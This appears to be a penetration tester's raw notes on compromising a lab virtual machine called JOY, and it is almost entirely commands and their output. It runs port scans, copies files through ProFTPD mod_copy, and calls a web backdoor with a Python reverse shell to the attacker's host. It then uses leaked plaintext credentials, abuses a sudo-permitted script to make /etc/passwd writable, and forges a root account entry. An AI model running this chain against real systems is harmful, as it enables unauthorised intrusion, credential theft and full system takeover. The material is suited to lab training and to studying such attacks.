─$ nmap -sSCV -p 21,22,25,80,110,139,143,445,465,587,993,995 192.168.56.132
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-21 00:44 PDT
Nmap scan report for 192.168.56.132
Host is up (0.00019s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
80/tcp  open  http        Apache httpd 2.4.25
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open  pop3        Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_pop3-capabilities: SASL TOP CAPA UIDL AUTH-RESP-CODE PIPELINING RESP-CODES STLS
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: listed LOGIN-REFERRALS more OK ID LITERAL+ have IDLE LOGINDISABLEDA0001 SASL-IR ENABLE IMAP4rev1 post-login STARTTLS capabilities Pre-login
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
445/tcp open  netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
587/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
993/tcp open  ssl/imap    Dovecot imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_imap-capabilities: listed LOGIN-REFERRALS OK ID LITERAL+ more IDLE ENABLE AUTH=PLAINA0001 SASL-IR IMAP4rev1 post-login have capabilities Pre-login
995/tcp open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: UIDL TOP CAPA USER AUTH-RESP-CODE PIPELINING RESP-CODES SASL(PLAIN)
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:40:E2:7F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Hosts: The,  JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5h19m58s, deviation: 4h37m07s, median: 7h59m57s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.12-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2025-03-21T23:44:21+08:00
| smb2-time: 
|   date: 2025-03-21T15:44:21
|_  start_date: N/A


//port 21:
    ftp> mget directory
    mget directory [anpqy?]? y

    ─$ cat directory | grep -v .txt 
        Patrick's Directory

        total 4664
        drwxr-xr-x 18 patrick patrick 204800 Mar 25 22:05 .
        drwxr-xr-x  4 root    root      4096 Jan  6  2019 ..
        -rw-------  1 patrick patrick    185 Jan 28  2019 .bash_history
        -rw-r--r--  1 patrick patrick    220 Dec 23  2018 .bash_logout
        -rw-r--r--  1 patrick patrick   3526 Dec 23  2018 .bashrc
        drwx------  7 patrick patrick   4096 Jan 10  2019 .cache
        drwx------ 10 patrick patrick   4096 Dec 26  2018 .config
        drwxr-xr-x  2 patrick patrick   4096 Dec 26  2018 Desktop
        drwxr-xr-x  2 patrick patrick   4096 Dec 26  2018 Documents
        drwxr-xr-x  3 patrick patrick   4096 Jan  6  2019 Downloads
        drwx------  3 patrick patrick   4096 Dec 26  2018 .gnupg
        -rwxrwxrwx  1 patrick patrick      0 Jan  9  2019 haha
        -rw-------  1 patrick patrick   8532 Jan 28  2019 .ICEauthority
        drwxr-xr-x  3 patrick patrick   4096 Dec 26  2018 .local
        drwx------  5 patrick patrick   4096 Dec 28  2018 .mozilla
        drwxr-xr-x  2 patrick patrick   4096 Dec 26  2018 Music
        drwxr-xr-x  2 patrick patrick   4096 Jan  8  2019 .nano
        drwxr-xr-x  2 patrick patrick   4096 Dec 26  2018 Pictures
        -rw-r--r--  1 patrick patrick    675 Dec 23  2018 .profile
        drwxr-xr-x  2 patrick patrick   4096 Dec 26  2018 Public
        d---------  2 root    root      4096 Jan  9  2019 script
        drwx------  2 patrick patrick   4096 Dec 26  2018 .ssh
        -rw-r--r--  1 patrick patrick      0 Jan  6  2019 Sun
        drwxr-xr-x  2 patrick patrick   4096 Dec 26  2018 Templates
        -rw-r--r--  1 patrick patrick    407 Jan 27  2019 version_control
        drwxr-xr-x  2 patrick patrick   4096 Dec 26  2018 Videos

        You should know where the directory can be accessed.

        Information of this Machine!

        Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux

└─$ nmap -sU -Pn -p- --top-port=40 -v 192.168.56.132
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-24 23:30 PDT
Initiating ARP Ping Scan at 23:30
Scanning 192.168.56.132 [1 port]
Completed ARP Ping Scan at 23:30, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:30
Completed Parallel DNS resolution of 1 host. at 23:30, 0.09s elapsed
Initiating UDP Scan at 23:30
Scanning 192.168.56.132 [40 ports]
Discovered open port 123/udp on 192.168.56.132
Discovered open port 161/udp on 192.168.56.132
Increasing send delay for 192.168.56.132 from 0 to 50 due to max_successful_tryno increase to 4
Discovered open port 137/udp on 192.168.56.132
Completed UDP Scan at 23:30, 12.07s elapsed (40 total ports)
Nmap scan report for 192.168.56.132
Host is up (0.0013s latency).

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
80/udp    open|filtered http
111/udp   closed        rpcbind
123/udp   open          ntp
135/udp   open|filtered msrpc
136/udp   open|filtered profile
137/udp   open          netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   closed        netbios-ssn
161/udp   open          snmp



nmap -sSCV -Pn -sU -p 1900,5353,36969,38334,53256 192.168.56.132

|   668: 
|     Name: minissdpd
|     Path: /usr/sbin/minissdpd
|     Params: -i 0.0.0.0
|   692: 
|     Name: in.tftpd
|     Path: /usr/sbin/in.tftpd
|     Params: --listen --user tftp --address 0.0.0.0:36969 --secure /home/patrick
|   697: 
//36969 is a tftp server which is the home directory of patrick.

─$ telnet 192.168.56.132 21 
Trying 192.168.56.132...
Connected to 192.168.56.132.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/upload/version_control
250 Copy successful
^C
500 Invalid command: try being more creative

500 Invalid command: try being more creative
bye
500 BYE not understood

500 Invalid command: try being more creative
quit
221 Goodbye.
Connection closed by foreign host.

─$ ftp 192.168.56.132
Connected to 192.168.56.132.
220 The Good Tech Inc. FTP Server
Name (192.168.56.132:ed): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||59505|)
150 Opening ASCII mode data connection for file list
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Mar 25 15:20 upload
226 Transfer complete
ftp> cd upload
250 CWD command successful
ftp> mget version_control
mget version_control [anpqy?]? y
229 Entering Extended Passive Mode (|||10581|)
150 Opening BINARY mode data connection for version_control (407 bytes)
100% |**************************************************************************|   407        2.14 MiB/s    00:00 ETA
226 Transfer complete
407 bytes received in 00:00 (267.29 KiB/s)

─$ cat version_control 
Version Control of External-Facing Services:

Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.


http://192.168.56.132/backdoor.php?cmd=

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.105",8821));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c "import pty;pty.spawn('/bin/bash')"

└─$ nc -nvlp 8821
listening on [any] 8821 ...
connect to [192.168.56.105] from (UNKNOWN) [192.168.56.132] 33996
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)
$ pwd
/var/www/tryingharderisjoy
$ cd /home
$ ls
ftp
patrick
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
rtkit:x:105:110:RealtimeKit,,,:/proc:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
geoclue:x:109:115::/var/lib/geoclue:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
pulse:x:111:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi:x:112:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:113:120:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:114:121::/var/lib/saned:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:122:Gnome Display Manager:/var/lib/gdm3:/bin/false
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
ossec:x:117:123::/var/ossec/:/bin/false
ossecm:x:118:123::/var/ossec/:/bin/false
ossecr:x:119:123::/var/ossec/:/bin/false
mysql:x:120:125:MySQL Server,,,:/nonexistent:/bin/false
ntp:x:121:126::/home/ntp:/bin/false
Debian-snmp:x:122:127::/var/lib/snmp:/bin/false
ftp:x:1001:1001::/home/ftp:/bin/false
tftp:x:123:128:tftp daemon,,,:/srv/tftp:/bin/false
postfix:x:124:129::/var/spool/postfix:/bin/false
dovecot:x:125:131:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:126:132:Dovecot login user,,,:/nonexistent:/bin/false


$ ls -la
total 116
drwxr-xr-x 8 www-data www-data  4096 Jan  6  2019 .
drwxr-xr-x 3 www-data www-data  4096 Mar 25 23:49 ..
-rw-r--r-- 1 www-data www-data    92 Jul 19  2016 .hgtags
-rw-r--r-- 1 www-data www-data   262 Dec 28  2018 .htaccess
-rw-r--r-- 1 www-data www-data    44 Dec 28  2018 .htpasswd
-rwxr-xr-x 1 www-data www-data   317 Jul 19  2016 CONTRIB
-rw-r--r-- 1 www-data www-data 35745 Jul 19  2016 LICENSE
-rw-r--r-- 1 www-data www-data  2106 Jul 19  2016 README
-rw-r--r-- 1 www-data www-data   923 Jul 19  2016 README.search
drwxr-xr-x 3 www-data www-data  4096 Jul 19  2016 css
-rw-r--r-- 1 www-data www-data   218 Jul 19  2016 htaccess_def.txt
drwxr-xr-x 2 www-data www-data  4096 Jul 19  2016 img
-rwxr-xr-x 1 www-data www-data  5177 Jul 19  2016 index.php
drwxr-xr-x 2 www-data www-data  4096 Jul 19  2016 js
drwxr-xr-x 3 www-data www-data  4096 Dec 28  2018 lib
-rw-r--r-- 1 www-data www-data   462 Jul 19  2016 ossec_conf.php
-rw-r--r-- 1 www-data www-data   134 Jan  6  2019 patricksecretsofjoy
-rwxr-xr-x 1 www-data www-data  2471 Jul 19  2016 setup.sh
drwxr-xr-x 2 www-data www-data  4096 Dec 28  2018 site
drwxrwxrwx 2 www-data www-data  4096 Dec 28  2018 tmp

$ cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis

how would these hack3rs ever find such a page?'

su patrick
Password: apollo098765

patrick@JOY:/var/www/tryingharderisjoy/ossec$

patrick@JOY:/var/www/tryingharderisjoy/ossec$ sudo -l
sudo -l
Matching Defaults entries for patrick on JOY:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User patrick may run the following commands on JOY:
    (ALL) NOPASSWD: /home/patrick/script/test

patrick@JOY:~$ sudo /home/patrick/script/test
sudo /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
../../../../../../etc/passwd
../../../../../../etc/passwd
What permissions would you like to set the file to?
777
777
Currently changing file permissions, please wait.
Tidying up...
Done!
patrick@JOY:~$ ls -la /etc/passwd
ls -la /etc/passwd
-rwxrwxrwx 1 root root 2556 Jan 28  2019 /etc/passwd

└─$ openssl passwd -1 -salt new 111222
$1$new$.Nm5wgdVZR7.gAjnHaRK40

echo "new:\$1\$new\$.Nm5wgdVZR7.gAjnHaRK40:0:0::/root/bin/bash"

patrick@JOY:~$ su new
su new
Password: 111222

# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
author-secret.txt      dovecot.crt  dovecot.key     proof.txt	rootCA.pem
document-generator.sh  dovecot.csr  permissions.sh  rootCA.key	rootCA.srl
# cat proof.txt
cat proof.txt
Never grant sudo permissions on scripts that perform system functions!

